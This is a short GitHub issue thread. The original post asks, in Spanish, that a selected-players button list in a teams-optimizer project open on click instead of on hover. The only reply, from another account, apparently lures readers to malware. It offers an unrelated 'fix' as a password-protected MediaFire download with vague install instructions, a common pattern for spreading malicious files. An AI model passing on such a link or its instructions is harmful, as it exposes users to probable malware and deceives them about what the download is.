### ISSUE TITLE
Selected players button list

### ISSUE THREAD

**Issue by fedecarboni7** [fedecarboni7/teams-optimizer#66]
hacer que se abra al hacerle click en vez de hover, y que se mantenga abierto hasta que toques afuera de la lista o tocando nuevamente el botón

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
